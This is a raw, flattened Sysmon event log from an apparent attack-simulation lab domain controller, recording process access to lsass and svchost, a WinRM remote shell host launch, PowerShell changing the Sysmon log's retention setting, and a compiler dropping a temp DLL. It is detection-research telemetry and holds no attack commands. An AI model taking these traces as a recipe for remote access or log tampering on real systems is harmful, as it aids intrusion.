13:33:20.919{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000440Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.919{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000439Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.919{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000438Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.919{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000437Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.919{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000436Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.919{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000435Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.919{59A5CD1D-8C95-6005-0500-00000000A201}6401196C:\Windows\system32\csrss.exe{59A5CD1D-8E20-6005-D202-00000000A201}2340C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000434Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.919{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E20-6005-D202-00000000A201}2340C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000433Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.919{59A5CD1D-8E20-6005-D202-00000000A201}2340C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-8E20-6005-E7C2-100000000000}0x10c2e70HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{59A5CD1D-8CA8-6005-0C00-00000000A201}480C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x8000000000000000432Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.903{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000431Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.903{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000430Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.903{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000429Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.685{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000428Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.685{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000427Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.685{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000426Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.638{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000425Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.638{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000424Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.622{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000423Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:20.481{59A5CD1D-8E1F-6005-CE02-00000000A201}3720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Sysmon/Operational\RetentionDWORD (0x00000000) 10341000x8000000000000000422Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.325{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000421Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.325{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000420Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.325{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000419Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:33:20.169{59A5CD1D-8E20-6005-D002-00000000A201}4268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\t4kqsmcp.dll2021-01-18 13:33:20.075 10341000x8000000000000000418Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.169{59A5CD1D-8E1F-6005-CB02-00000000A201}41484316C:\Windows\system32\conhost.exe{59A5CD1D-8E20-6005-D102-00000000A201}4244C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000417Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.169{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000416Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.169{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dl